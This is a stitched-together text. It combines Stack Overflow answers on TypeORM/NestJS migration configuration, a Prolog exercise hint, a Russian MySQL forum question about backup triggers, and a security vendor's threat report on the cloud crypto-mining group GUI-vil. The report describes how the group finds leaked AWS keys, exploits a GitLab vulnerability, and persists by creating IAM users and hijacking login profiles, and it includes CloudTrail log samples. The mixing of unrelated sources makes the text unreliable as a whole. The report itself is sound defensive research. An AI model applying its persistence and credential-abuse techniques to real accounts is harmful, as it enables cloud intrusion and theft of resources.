helps me 0 7 Also check out your imports in the entities. Don't import { SomeClassFromTypeorm } from 'typeorm/browser'; since this can lead to the same error. It happened to me after my IDE automatically imported the wrong package. Delete '/browser' from the import. 1 • 1 It it helps anyone else, this exact same thing happened to me, on a nestjs & typeorm project. import { Unique } from 'typeorm/browser'; just needed to be changed to import { Unique } from 'typeorm'; – Jay Feb 16, 2022 at 0:20 6 This is how I've manage to fix it. With a single configuration file I can run the migrations on application boostrap or using TypeOrm's CLI. src/config/ormconfig.ts import parseBoolean from '@eturino/ts-parse-boolean'; import { TypeOrmModuleOptions } from '@nestjs/typeorm'; import * as dotenv from 'dotenv'; import { join } from 'path'; dotenv.config(); export = [ { //name: 'default', type: 'mssql', host: process.env.DEFAULT_DB_HOST, username: process.env.DEFAULT_DB_USERNAME, password: process.env.DEFAULT_DB_PASSWORD, database: process.env.DEFAULT_DB_NAME, options: { instanceName: process.env.DEFAULT_DB_INSTANCE, enableArithAbort: false, }, logging: parseBoolean(process.env.DEFAULT_DB_LOGGING), dropSchema: false, synchronize: false, migrationsRun: parseBoolean(process.env.DEFAULT_DB_RUN_MIGRATIONS), migrations: [join(__dirname, '..', 'model/migration/*.{ts,js}')], cli: { migrationsDir: 'src/model/migration', }, entities: [ join(__dirname, '..', 'model/entity/default/**/*.entity.{ts,js}'), ], } as TypeOrmModuleOptions, { name: 'other', type: 'mssql', host: process.env.OTHER_DB_HOST, username: process.env.OTHER_DB_USERNAME, password: process.env.OTHER_DB_PASSWORD, database: process.env.OTHER_DB_NAME, options: { instanceName: process.env.OTHER_DB_INSTANCE, enableArithAbort: false, }, logging: parseBoolean(process.env.OTHER_DB_LOGGING), dropSchema: false, synchronize: false, migrationsRun: false, entities: [], } as TypeOrmModuleOptions, ]; src/app.module.ts import configuration from '@config/configuration'; import validationSchema from '@config/validation'; import { Module } from '@nestjs/common'; import { ConfigModule } from '@nestjs/config'; import { TypeOrmModule } from '@nestjs/typeorm'; import { LoggerService } from '@shared/logger/logger.service'; import { UsersModule } from '@user/user.module'; import { AppController } from './app.controller'; import ormconfig = require('./config/ormconfig'); //path mapping doesn't work here @Module({ imports: [ ConfigModule.forRoot({ cache: true, isGlobal: true, validationSchema: validationSchema, load: [configuration], }), TypeOrmModule.forRoot(ormconfig[0]), //default TypeOrmModule.forRoot(ormconfig[1]), //other db LoggerService, UsersModule, ], controllers: [AppController], }) export class AppModule {} package.json "scripts": { ... "typeorm": "ts-node -r tsconfig-paths/register ./node_modules/typeorm/cli.js --config ./src/config/ormconfig.ts", "typeorm:migration:generate": "npm run typeorm -- migration:generate -n", "typeorm:migration:run": "npm run typeorm -- migration:run" }, Project structure src/ ├── app.controller.ts ├── app.module.ts ├── config │ ├── configuration.ts │ ├── ormconfig.ts │ └── validation.ts ├── main.ts ├── model │ ├── entity │ ├── migration │ └── repository ├── route │ └── user └── shared └── logger 1 • I had to update migrations to match your syntax – Lahori May 28, 2021 at 11:02 4 I was using Node.js with Typescript and TypeORM when I faced this issue. Configuring in ormconfig.json file worked for me. entities: ['dist/**/*.entity.js'] My full code of ormconfig.json file: { "type": "mysql", "host": "localhost", "port": 3306, "username": "xxxxxxxx", "password": "xxxxxxxx", "database": "typescript_orm", "synchronize": true, "logging": false, "migrationTableName": "migrations", "entities": [ "dist/**/*.entity.js" ], "migrations": [ "src/migration/**/*.{ts, js}" ], "suscribers": [ "src/suscriber/**/*.{ts, js}" ], "cli": { "entitiesDir": "src/model", "migrationDir": "src/migration", "suscribersDir": "src/suscriber" } } 3 In line with other people's comments - it does in fact seem silly to have to depend on generated code for this to work. I do not take credit for this solution as it's someone else's repository, but it does in fact allow full Typescript only migrations. It relies on the .env file Typeorm values instead of ormconfig.json although I'm sure it could be translated. I found it instrumental in helping me remove the dependency on .js files. Here is the repo: https://github.com/mthomps4/next-now-test/tree/next-typeorm-example Explanation as to how it's working: Aside from your usual .env or ormconfig.json file with the proper localhost db connection in it, you also need to specify the following properly in ormconfig.json or .env file TYPEORM_ENTITIES="entities/*.ts" TYPEORM_MIGRATIONS="migrations/*.ts" TYPEORM_ENTITIES_DIR="entities" TYPEORM_MIGRATIONS_DIR="migrations" Notice the entities and migrations globs only have *.ts. The other very important piece is how your npm scripts are setup to run with ts-node. You need an extended tsconfig that has the following in it somewhere: { "extends": "./tsconfig.json", "compilerOptions": { "module": "commonjs" } } This is what allows ts-node to "pick up" the .ts files properly while generating a migration. This npm script (the DOTENV part is only if using .env files instead of ormconfig.json) specifies to use that tsconfig.json "local": "DOTENV_CONFIG_PATH=./.env ts-node -P ./tsconfig.yarn.json -r dotenv/config" Which is leveraged as a "pre-cursor" script to this: "typeorm:local": "yarn local ./node_modules/typeorm/cli.js" I'm not 100% sure all of that is necessary (you may could do it all inline) but it works for me. Basically this says "invoke the typrorm cli in the context of ts-node with a specific .env file and a specific tsconfig." You may be able to skip those configurations in some cases. Lastly, this script now works: "g:migration": "yarn typeorm:local migration:generate -n" So by running: npm run g:migration -- User You will get your automatically generated migration file based on your current changed entities! So 3 nested npm scripts later, we have a very specific way to run the "generate" migration conmmand with all the proper configuration to use only TS files. Yay - no wonder some people still rail against typescript but thankfully this does work and the example repo above has it all preconfigured if you want to try it out to see how it "just works". 1 • 1 Thanks for this; useful! Feb 5, 2021 at 16:21 3 check your TypeOrmModule's entities TypeOrmModule.forRoot({ type: 'postgres', host: 'localhost', port: 5432, username: 'postgres', password: '#GoHomeGota', database: 'quiz', **entities: ["dist/**/*.entity{.ts,.js}"],** synchronize: true, }), 3 The alternative I found for this is having two orm config files namely orm-config.ts and cli-orm-config.ts (You can name them whatever) //content of cli-orm-config.ts import { DataSource, DataSourceOptions } from "typeorm" import 'dotenv/config' export const cliOrmConfig: DataSourceOptions = { type: 'postgres', host: process.env.DATABASE_HOST, port: (process.env.PG_DATABASE_PORT as any) as number, username: process.env.PG_DATABASE_USER, password: process.env.PG_DATABASE_PASSWORD, database: process.env.DATABASE_NAME, entities: ["src/**/*/*.entity{.ts,.js}"], migrations: ["src/**/*/*-Migration{.ts,.js}"] } const datasource = new DataSource(cliOrmConfig) export default datasource //content of orm-config.ts, this is the one I use in nest TypeOrmModule.forRoot(ormConfig) import { DataSource, DataSourceOptions } from 'typeorm'; import 'dotenv/config' export const ormConfig: DataSourceOptions = { type: 'postgres', host: process.env.DATABASE_HOST, port: (process.env.PG_DATABASE_PORT as any) as number, username: process.env.PG_DATABASE_USER, password: process.env.PG_DATABASE_PASSWORD, database: process.env.DATABASE_NAME, entities: ["dist/src/**/*/*.entity{.ts,.js}"] } const datasource = new DataSource(ormConfig) export default datasource // My package.json relevant scripts section "typeorm": "ts-node ./node_modules/typeorm/cli -d ./src/db/cli-orm-config.ts", "nest:migration:generate": "npm run typeorm migration:generate ./src/db/migrations/Migration", "nest:migration:run": "npm run typeorm migration:run" I think as far as TypeOrm is concerned, the migration, cli parts should be teared apart from models loading and other stuffs; hence the seperation of the orm configs file for both. Hope it helps somebody 3 Surprised by these almost kinda hacky solutions, particularly of the accepted one... You should never import anything from a dist folder inside your ts source code! If the answered assumption is true, and you do this: entities: ['src/**/*.entity.{ts,js}'] then, why don't you rather DO THIS: import { Answer } from './entities/answer/answer.entity'; entities: [Answer] This way you would you use your ts code (correctly) and the builded js code would get provided to the TypeOrmModule in runtime. 0 2 Actually, typeorm was designed to work with javascript by default. To run the migrations with typescript, you must tell typeorm to do it. Just put in your package.json, in the scripts part this line below: "typeorm": "ts-node-dev ./node_modules/typeorm/cli.js" and then, try to migrate again: yarn typeorm migration:run 1 • doesnt work. "Missing required argument: dataSource" Jun 26, 2022 at 13:10 2 I think a better solution, than the accepted one, is to create a alias in your shell of choice, that uses ts-node inside node_modules. Note: I'm doing this in bash, with OhMyZsh, so your configuration might be totally different. 1: Open shell configuration Open shell configuration1 nano ~/.zshrc 2: Find the place where other aliases are defined and add a new alias alias typeorm="ts-node ./node_modules/typeorm/cli.js" 3: Close and save Press CTRL + X to request nano to exit and press Y to confirm to save the configuration. 4: Apply the new configuration . ~/.zshrc 5: Close terminal and open it again You can now go to your project root and type "typeorm" which will use ts-node in conjunction with the typeorm-cli from your node_modules. 2 I ran into this error trying to run typeorm migration:generate from a project created with the TypeORM starter kit (npx typeorm init). The issue came down to this bit that it inserted into package.json: "scripts": { "typeorm": "typeorm-ts-node-commonjs" } Change that to: "scripts": { "typeorm": "typeorm-ts-node-esm" } And you should be good to go: npm run -- typeorm migration:generate --dataSource path/to/data-source.ts NameOfMigration 1 • Thank you! Struggled a lot with this – treecon Jan 27, 2023 at 19:18 2 I Upgraded NestJs to 9.2.0 and typeorm to 0.3.10 And i got a probleme when runing a new migration But i Found out the solution and that works for me: in the previous Version (nest 7 typeorm 0.2) i used this command : npx ts-node ./node_modules/.bin/typeorm migration:generate -n MigrationName -d src/migrations and after updating i used this command and it workd for me: npx ts-node ./node_modules/.bin/typeorm migration:generate src/migration/MigrationName -d ormconfig.js when generate migration we need to set the path of the new migrationFile migration:generate -d means directory of migration => -d src/migration in typeorm 0.2 -d means dataSource (config) => -d ormconfig in typeorm 0.3 1 You need to have a something.module.ts for every section of your app. It works like Angular. This is setup with GraphQL resolvers and service. REST is a bit different with a controller. Each module will probably have an entity and if GraphQL, projects.schema.graphql. projects.module.ts import { Module } from '@nestjs/common'; import { TypeOrmModule } from '@nestjs/typeorm'; import { ProjectsService } from './projects.service'; import { Projects } from './projects.entity'; import { ProjectsResolvers } from './projects.resolvers'; @Module({ imports: [ TypeOrmModule.forFeature([Projects])], providers: [ ProjectsService, ProjectsResolvers ], }) export class ProjectsModule {} 4 • Excellent. So does that mean you can ever have a base entity shared across multiple modules or would that base entity have to be part of a commons module of sorts? Dec 22, 2019 at 2:49 • I think i've already imported entity to module. Please take a look at updated post – Anton Dec 24, 2019 at 12:29 • Sorry Anton, I'm traveling on vacation now and can't help you until January. I would have to look at my old REST modules and I don't have them with me. – Preston Dec 24, 2019 at 16:07 • 1 Anton, if you have already solved this then please post your solution to SO. – Preston Jan 3, 2020 at 16:57 1 This worked for me - no changes needed to your ormconfig.js. Run from your root directory where the node_modules are: ts-node ./node_modules/typeorm/cli.js migration:generate -n <MirgrationName> -c <ConnectionType> Example: ts-node ./node_modules/typeorm/cli.js migration:create -n AuthorHasMultipleBooks -c development 1 • not working "Not enough non-option arguments: got 0, need at least 1" Jun 26, 2022 at 13:11 1 Configuration to support migrations: // FILE: src/config/ormconfig.ts const connectionOptions: ConnectionOptions = { // Other configs here // My ormconfig isn't in root folder entities: [`${__dirname}/../**/*.entity.{ts,js}`], synchronize: false, dropSchema: false, migrationsRun: false, migrations: [getMigrationDirectory()], cli: { migrationsDir: 'src/migrations', } } function getMigrationDirectory() { const directory = process.env.NODE_ENV === 'migration' ? 'src' : `${__dirname}`; return `${directory}/migrations/**/*{.ts,.js}`; } export = connectionOptions; // FILE package.json { // Other configs here "scripts": { "typeorm": "NODE_ENV=migration ts-node -r tsconfig-paths/register ./node_modules/typeorm/cli.js --config src/config/database.ts", "typeorm:migrate": "npm run typeorm migration:generate -- -n", "typeorm:run": "npm run typeorm migration:run", "typeorm:revert": "npm run typeorm migration:revert" } } 1 I have encountered the same problem. The only difference is that my project uses .env file instead of ormconfig.json This is what my .env file configuration looks like. TYPEORM_ENTITIES = src/modules/*.entity.ts TYPEORM_MIGRATIONS = src/migrations/*.entity.ts TYPEORM_MIGRATIONS_RUN = src/migrations TYPEORM_ENTITIES_DIR = src/modules TYPEORM_MIGRATIONS_DIR = src/migrations And run by using command nest start The problem appears to be that TypeORM does not accept entities in the form of typescript files. There are two approaches that can be used to solve this problem. 1. Use node-ts instead of nest start solved the problem without modifying the path of the entities file. From my understanding, node-ts will process the typescript file in the src folder without issue. 2. Change the entity and migration file paths to point to the compiled js file in the dist folder instead. TYPEORM_ENTITIES = dist/modules/*.entity.js TYPEORM_MIGRATIONS = dist/migrations/*.entity.js TYPEORM_MIGRATIONS_RUN = dist/migrations TYPEORM_ENTITIES_DIR = dist/modules TYPEORM_MIGRATIONS_DIR = dist/migrations with this approach, I can use nest start without any problem. 1 I used this solution only for production. for development I change "../src/entity/**/*.ts" to "src/entity/**/*.ts" and then run this command: "nodemon --exec ts-node ./src/index.ts" and it works – 1 I solved the problem! 1. Create pm2.config.js file in root with below codes: module.exports = { apps: [ { name: "app", script: "./build/index.js", }, ], }; 2. Change entity path in ormconfig.js { "type": "postgres", "host": "localhost", "port": 5432, "username": "postgres", "password": "password", "database": "db_name", "synchronize": false, "logging": true, "entities": [ "../src/entity/**/*.ts", ===>>> this line is important "./build/entity/**/*.js" ], "migrations": [ "../src/migration/**/*.ts",===>>> this line is important "./build/migration/**/*.js" ], "subscribers": [ "../src/subscriber/**/*.ts",===>>> this line is important "./build/subscriber/**/*.js" ], "cli": { "entitiesDir": "src/entity", "migrationsDir": "src/migration", "subscribersDir": "src/subscriber" } } 3. tsconfig.json with below code: { "compilerOptions": { "lib": [ "es5", "es6" ], "target": "es5", "module": "commonjs", "moduleResolution": "node", "outDir": "./build", "emitDecoratorMetadata": true, "experimentalDecorators": true, "sourceMap": true, "esModuleInterop": true } } 4. Run below command for production: tsc =>> This command generate "build" folder 5. Run below command for run node app in pm2: tsc && pm2 start pm2.config.js Now after 2 days with this solution my app with node express & typeorm is worked! Also my app are working on linux & nginx with pm2. 1 • I used this solution only for production. for development I change "../src/entity/**/*.ts" to "src/entity/**/*.ts" and then run "nodemon --exec ts-node ./src/index.ts" and it works Sep 6, 2021 at 17:56 1 The accepted answer here (https://stackoverflow.com/a/59607836/2040160) was help me generate and run the migrations, but not to run the NestJS project. I got the same error as the author when I npm run start:dev. What worked for me, is to just generate the migrations file in vanilla JavaScript. My ormconfig,json file: { "type": "cockroachdb", "host": "localhost", "port": 26257, "username": "root", "password": "", "database": "test", "entities": ["dist/**/*.entity{.ts,.js}"], "migrations": ["migration/*.js"], "synchronize": false, "cli": { "migrationsDir": "migration" } } The script in package.json: "typeorm": "node --require ts-node/register ./node_modules/typeorm/cli.js" And the command I use to generate the migrations: npm run typeorm migration:generate -- -o -n init The -o flag will output the migrations in vanilla JavaScript. 2 • That is not a solution. You just created a workaround and pretend that the problem is fixed. – Michal Jan 16, 2022 at 22:17 • I don't pretend that the problem is fixed, I just wanted to help and add the workaround that worked for me. Maybe it'll shad more light on the issue and help someone figure out a solution. – Nirgn Apr 11, 2022 at 11:51 0 If you are writing in typescript and use tsc to create a dist folder with translated js files in it, then you probably have my issue and it will get fixed here. As it is mentioned here in the docs if you use nodemon server.js, then you will hit the entities from js perspective and it will not recognize import as it is ts and es6 related. However if you want to import entities from ts files, you should run ts-node server.ts! Personally I believe the former node server.js is a safer one to do as it is closer to the real case application. !!! HOWEVER !!! Be very careful as you have to delete the dist folder and rebuild it if you change an entity's name, otherwise it will throw an error or work unexpectedly. The error happens because the tsc will try to translate the changed and created ts files and leave the deleted files so it can run faster! I hope it helped as it will definitely help me in the future as I am almost certain I will forget about it again! 0 The error is on your ormconfig.json file. check where is your code searching for the entities, migrations, subscribers. In a dev, test environment it will search for them in your src/entities src/migrations src/subscribers. But in a production environment, if you leave it as it is, it will still search in the same path instead of your build path dist/src/entities etc.... ;) 0 I spent so much time in this mini compilation hell :) Just use the autoLoadEntities option in https://docs.nestjs.com/techniques/database v useful!! 0 0 For me, changing module in my tsconfig.ts from "module": "esnext" To: "module": "commonjs", Did the job. 0 In my scenario, the import statement problem persisted despite attempting various troubleshooting steps. Initially, my Node.js environment was set to version 20. However, after exhausting multiple solutions without success, I switched to Node.js version 18 and this issue was resolved. -2 npm run typeorm migration:generate -- -n translationLength 1 • 1 Your answer could be improved with additional supporting information. Please edit to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers in the help center. – Community Bot Mar 30, 2022 at 10:02 Your Answer By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.789612
General Material Lecture 1 Lecture 2 Lecture 3 Lecture 4 Lecture 5 Hint This task is very similar to the task that the predicate element_of/2, which we saw in the lecture, is solving. There are two cases which can be distinguished. 1. The first element of the input list is a 0. In this case the list obviously contains 0 and element_of should succeed. 2. The first element is not 0. In this case, the tail of the list should contain a 0. That is, element_of should be true of the tail. Solution Back to the exercise.
__label__pos
0.736924
  Íîâîñòè Äîêóìåíòàöèÿ Download Webboard Ïîèñê FAQ/×àÂî Îáðàòíàÿ ñâÿçü MySQL.RU - Webboard Âåðíóòüñÿ òðèããåðû (Michael) 06/11/2007 - 19:08:50       Re: òðèããåðû (EuGen) 08/11/2007 - 12:43:17 From: Michael - 06/11/2007 - 19:08:50 Subject:òðèããåðû ----------------- â îáùåì õî÷åòñÿ ðåàëèçîâàòü ñëåäóþùèé ôóíêöèîíàë: åñòü òàáëè÷êàêîä SQL CREATE TABLE `ceway_tree` ( `id` int(11) NOT NULL auto_increment, `pid` int(11) NOT NULL default '0', `ord` int(11) NOT NULL default '0', `lang` varchar(3) collate utf8_bin NOT NULL default 'rus', `alias` varchar(255) collate utf8_bin NOT NULL, `name` varchar(255) collate utf8_bin NOT NULL, `component` varchar(255) collate utf8_bin NOT NULL, `modules` text collate utf8_bin NOT NULL, `template` varchar(255) collate utf8_bin NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin AUTO_INCREMENT=6 ; íà íåå íóæíî ïîâåñèòü 2 òðèããåðà (update, delete), êîòîðûå ïåðåä èçìåíåíèåì/óäàëåíèåì çàïèñè êîïèðîâàëè áû åå â äðóãóþ òàáëèöó, òàêîé æå ñòðóêòóðû (ceway_tree_backup)... ìîæíî ëè êàê-òî ýòî ðåàëèçîâàòü? [Ýòî ñîîáùåíèå - ñïàì!] Ïîñëåäíèå ñîîáùåíèÿ èç ôîðóìà Óâàæàåìûå ïîñåòèòåëè ôîðóìà MySQL.RU! Óáåäèòåëüíàÿ ïðîñüáà, ïðåæäå ÷åì çàäàâàòü ñâîé âîïðîñ â ýòîì ôîðóìå, îáðàòèòå âíèìàíèå íà ðàçäåëû: - îòâåòû íà íàèáîëåå ÷àñòî çàäàâàåìûå âîïðîñû - FAQ - ðàçäåë äîêóìåíòàöèÿ - ðàçäåë ïîèñê ïî ñîîáùåíèÿì ôîðóìà è äîêóìåíòàöèè Òàêæå, ñòàðàéòåñü íàèáîëåå ïîäðîáíî óêàçûâàòü ñâîþ ñèòóàöèþ (âåðñèþ îïåðàöèîííîé ñèñòåìû, âåðñèþ MySQL, âåðñèþ ïðîãðàììíîãî îáåñïå÷åíèÿ, ïî êîòîðîìó âîçíèêàåò âîïðîñ, òåêñò âîçíèêàþùèõ îøèáîê, è äð.) Ïîìíèòå, ÷åì êîíêðåòíåå Âû îïèøåòå ñèòóàöèþ, òåì áîëüøå øàíñîâ ïîëó÷èòü ðåàëüíóþ ïîìîùü.  Èìÿ:  E-mail:  Òåìà:  Òåêñò: Êîä ïîäòâåðæäåíèÿ îòïðàâêè: Code 32408 ÐÅÊËÀÌÀ ÍÀ ÑÀÉÒÅ   Ñîçäàíèå ñàéòîâ | |
__label__pos
0.817658
4/24 KPMG + Permiso LUCR-3 (Scattered Spider) Threat Briefing REGISTER NOW Illustration Cloud Unmasking GUI-Vil: Financially Motivated Cloud Threat Actor Summary (the TL;DR) Guivil ALC Permiso’s p0 Labs has been tracking a threat actor for the last 18 months. In this article we will describe the attack lifecycle and detection opportunities for the cloud-focused, financially motivated threat actor we have dubbed as p0-LUCR-1, aka GUI-vil (Goo-ee-vil). GUI-vil is a financially motivated threat group sourcing from Indonesia whose primary objective is performing unauthorized cryptocurrency mining activities. Leveraging compromised credentials, the group has been observed exploiting Amazon Web Services (AWS) EC2 instances to facilitate their illicit crypto mining operations. Permiso first observed this threat actor in November of 2021, and most recently observed their activity in April of 2023. The group displays a preference for Graphical User Interface (GUI) tools, specifically an older version of S3 Browser (version 9.5.5, released January of 2021) for their initial operations. Upon gaining AWS Management Console access, they conduct their operations directly through the web browser. The source IP addresses associated with the attacker's activities are linked to two (2) specific Indonesian Autonomous System Numbers (ASNs) - PT. Telekomunikasi Selula and PT Telekomunikasi Indonesia. In their typical attack lifecycle, GUI-vil initially performs reconnaissance by monitoring public sources for exposed AWS keys (GitHub, Pastebin) and scanning for vulnerable GitLab instances. Initial compromises are predominantly achieved via exploiting known vulnerabilities such as CVE-2021-22205, or via using publicly exposed credentials. GUI-vil, unlike many groups focused on crypto mining, apply a personal touch when establishing a foothold in an environment. They attempt to masquerade as legitimate users by creating usernames that match the victim’s naming standard, or in some cases taking over existing users by creating login profiles for a user where none existed (takeover activity appearing as iam:GetLoginProfile failure followed by successful iam:CreateLoginProfile). The group's primary mission, financially driven, is to create EC2 instances to facilitate their crypto mining activities. In many cases the profits they make from crypto mining are just a sliver of the expense the victim organizations have to pay for running the EC2 instances. Attacker Attributes Highlights: • Unlike many commodity threat actors in the cloud that rely on automation, GUI-vil are engaged attackers at the keyboard, ready to adapt to whatever situation they are in. • They are allergic to CLI utilities, using S3 Browser and AWS Management Console via web browsers as their tooling. • They apply a personal touch. They model the name of their IAM Users, and sometimes their policies, keypairs, etc., on what they find present in the environment. Often time this helps them blend in. • They fight hard to maintain access in an environment when defenders find them. They don’t just tuck their tail and leave. • They often make mistakes by leaving S3 Browser defaults. • <YOUR-BUCKET-NAME>” being a favorite, but also default policy and IAM user names Your Bucket { "userName": "FileBackupAccount", "policyName": "dq", "policyDocument": "{\\r\\n \\"Statement\\": [\\r\\n {\\r\\n \\"Effect\\": \\"Allow\\",\\r\\n \\"Action\\": \\"s3:GetObject\\",\\r\\n \\"Resource\\": \\"arn:aws:s3:::<YOUR-BUCKET-NAME>/*\\",\\r\\n \\"Condition\\": {}\\r\\n }\\r\\n ]\\r\\n}" } Example request parameters from iam:PutUserPolicy event in CloudTrail logs Mission GUI-vil is a financially motivated threat actor, that leverages compromised credentials to spin up EC2 instances for use in crypto mining. Tooling GUI-vil leverages mostly GUI tools in their attacks. Initial access, reconnaissance, and persistence are all completed using the GUI utility S3 Browser. We have observed the threat actors continued use of the same version of S3 Browser (version 9.5.5, released January of 2021) to carry out their attacks since November 13, 2021. Once GUI-vil is able to create or take ownership of an IAM user with AWS Management Console access, they perform the rest of their activities directly through the web browser and AWS Management Console. Hours of operations (UTC/GMT) Guivil Hours Infrastructure All source addresses the attacker has originated from belong to two ASNs in Indonesia • PT. Telekomunikasi Selula • PT Telekomunikasi Indonesia Victimology GUI-vil is an equal opportunity attacker. Rather than targeting specific organizations, they are opportunistic and will attempt to attack any organization for which they can discover compromised credentials. Attacker Lifecycle info-image Initial Recon In order to support their mechanisms for initial access, GUI-vil performs two (2) main forms of reconnaissance: • Monitoring common public sources for exposed AWS access keys such as GitHub and Pastebin. • Scanning for vulnerable versions of software repositories such as GitLab. Initial Compromise & Establishing Foothold We have observed this threat actor leverage two (2) methods of initial compromise: • Leverage CVE-2021-22205 to gain Remote Code Execution (RCE) on vulnerable GitLab instances. Once GitLab is exploited the threat actor reviews repositories for AWS access keys. • In most instances this threat actor is able to find publicly exposed credentials and directly leverage them. The discovered access keys become their foothold into the AWS environment. They validate the access key and secret are active credentials by entering them into the Windows GUI utility S3 Browser, which will first execute the ListBuckets command against the S3 service. { "eventVersion": "1.08", "userIdentity": { "type": "IAMUser", "principalId": "redacted", "arn": "arn:aws:iam::redacted:user/external_audit", "accountId": "redacted", "accessKeyId": "AKIA******", "userName": "external_audit" }, "eventTime": "2023-04-18T14:47:39.0000000Z", "eventSource": "s3.amazonaws.com", "eventName": "ListBuckets", "awsRegion": "us-east-1", "sourceIPAddress": "36.85.110.142", "userAgent": "[S3 Browser 9.5.5 https://s3browser.com]", "requestParameters": { "Host": "s3.us-east-1.amazonaws.com" }, "responseElements": null, "requestID": "T1ACJXN3EJQ4T58X", "eventID": "af6814ab-10e1-4c8a-88b6-384874592519", "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "redacted", "eventCategory": "Management", "tlsDetails": { "tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "s3.us-east-1.amazonaws.com" }, "additionalEventData": { "SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 0, "AuthenticationMethod": "AuthHeader", "x-amz-id-2": "2ZRMAF9dvfjiLRZq1UoaE6tspOgoHk4X/Vtvjb8orWdQPGgJQiOuXhn13eOL3s4+BY/+Fuf7ZxE=", "bytesTransferredOut": 389 } } Escalate Privileges Given that cloud credentials are often grossly over-privileged, this threat actor does not often need to elevate their privileges. In one attack by GUI-vil though, the credentials the threat actor started with had read-only permissions across all services. The attacker used these credentials to review data in all available S3 buckets, and was able to find credentials with full administrator privileges in a Terraform tfstate file. Internal Recon GUI-vil has two (2) main methods of performing internal reconnaissance: • Review of accessible S3 buckets • Exploring what services are accessible and utilized by the victim organization via the AWS Management Console. Services we have observed them exploring (in order of descending prevalence) include: ec2.amazonaws.com health.amazonaws.com iam.amazonaws.com organizations.amazonaws.com elasticloadbalancing.amazonaws.com autoscaling.amazonaws.com monitoring.amazonaws.com cloudfront.amazonaws.com billingconsole.amazonaws.com s3.amazonaws.com compute-optimizer.amazonaws.com ce.amazonaws.com dynamodb.amazonaws.com config.amazonaws.com ram.amazonaws.com ssm.amazonaws.com kms.amazonaws.com securityhub.amazonaws.com servicecatalog-appregistry.amazonaws.com sts.amazonaws.com cloudtrail.amazonaws.com trustedadvisor.amazonaws.com logs.amazonaws.com dax.amazonaws.com sso.amazonaws.com support.amazonaws.com account.amazonaws.com elasticfilesystem.amazonaws.com resource-groups.amazonaws.com ds.amazonaws.com tagging.amazonaws.com cloudhsm.amazonaws.com access-analyzer.amazonaws.com resource-explorer-2.amazonaws.com Additionally, we observed GUI-vil monitoring CloudTrail logs for changes that the victims’ organizations were making when trying to evict GUI-vil from their environments. This allowed GUI-vil to adapt their persistence to bypass restrictions the victim organization was putting in place. { "eventVersion": "1.08", "userIdentity": { "type": "IAMUser", "principalId": "redacted", "arn": "arn:aws:iam::redacted:user/andy", "accountId": "redacted", "accessKeyId": "ASIA****", "userName": "andy", "sessionContext": { "sessionIssuer": {}, "webIdFederationData": {}, "attributes": { "creationDate": "2023-04-19T01:16:27.0000000Z", "mfaAuthenticated": "false" } } }, "eventTime": "2023-04-19T01:21:14.0000000Z", "eventSource": "cloudtrail.amazonaws.com", "eventName": "LookupEvents", "awsRegion": "us-east-1", "sourceIPAddress": "36.85.110.142", "userAgent": "AWS Internal", "requestParameters": { "maxResults": 50, "lookupAttributes": [ { "attributeKey": "ReadOnly", "attributeValue": "false" } ] } Maintain Presence (IAM) In order to maintain a presence in the victim organization, GUI-vil has leveraged several different mechanisms. Based on observed activity, they exclusively utilize S3 Browser to make creations and modifications to the IAM service. • GUI-vil will often create new IAM users to maintain ensure they can persist in an environment in case their original compromised credentials are discovered. When creating IAM users GUI-vil will often attempt to conform to the naming standards of existing IAM users. For example, in one environment they created a user named sec_audit which they modelled off of other audit users in the organization. They do often move too fast for their own good, sometimes forgetting to take out the default name that S3 Browser supplies when creating a new user. Guivil 3browser Newuser { "eventVersion": "1.08", "userIdentity": { "type": "IAMUser", "principalId": "redacted", "arn": "arn:aws:iam::redacted:user/terraform", "accountId": "redacted", "userName": "terraform", "accessKeyId": "AKIA*****" }, "eventTime": "2023-04-18T15:05:27.0000000Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateUser", "awsRegion": "us-east-1", "sourceIPAddress": "36.85.110.142", "userAgent": "S3 Browser 9.5.5 <https://s3browser.com>", "requestParameters": { "userName": "sec_audit", "path": "/" }, "responseElements": { "user": { "arn": "arn:aws:iam::redacted:user/sec_audit", "userName": "sec_audit", "userId": "redacted", "createDate": "Apr 18, 2023 3:05:27 PM", "path": "/" } } • GUI-vil will also create access keys for the new identities they are creating so they can continue usage of S3 Browser with these new users. Guivil S3browser Createkey • GUI-vil will create login profiles, to enable access to AWS Management Console. We have observed GUI-vil apply this tactic to avoid the noise of creating a new user. They look for identities that do not have login profiles and, once found, create a login profile. This allows the attacker to inherit the permissions of that identity and stay under the radar of security teams that do not monitor new login profiles being created. Guivil S3browser Loginprofile { "eventVersion": "1.08", "userIdentity": { "type": "IAMUser", "principalId": "redacted", "arn": "arn:aws:iam::redacted:user/terraform", "accountId": "redacted", "accessKeyId": "AKIA****", "userName": "terraform" }, "eventTime": "2023-04-18T15:27:22.0000000Z", "eventSource": "iam.amazonaws.com", "eventName": "GetLoginProfile", "awsRegion": "us-east-1", "sourceIPAddress": "36.85.110.142", "userAgent": "S3 Browser 9.5.5 <https://s3browser.com>", "requestParameters": { "userName": "andy" }, "responseElements": null, "requestID": "33147b1e-f106-440e-b63a-f4fca8da0170", "eventID": "7d7ad4e4-3f50-42d1-af4f-6d7db737ecdb", "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "redacted", "eventCategory": "Management", "tlsDetails": { "tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "iam.amazonaws.com" }, "errorCode": "NoSuchEntityException", "errorMessage": "Login Profile for User andy cannot be found." } { "eventVersion": "1.08", "userIdentity": { "type": "IAMUser", "principalId": "redacted", "arn": "arn:aws:iam::redacted:user/terraform", "accountId": "redacted", "accessKeyId": "AKIA****", "userName": "terraform" }, "eventTime": "2023-04-18T15:27:29.0000000Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateLoginProfile", "awsRegion": "us-east-1", "sourceIPAddress": "36.85.110.142", "userAgent": "S3 Browser 9.5.5 <https://s3browser.com>", "requestParameters": { "userName": "andy", 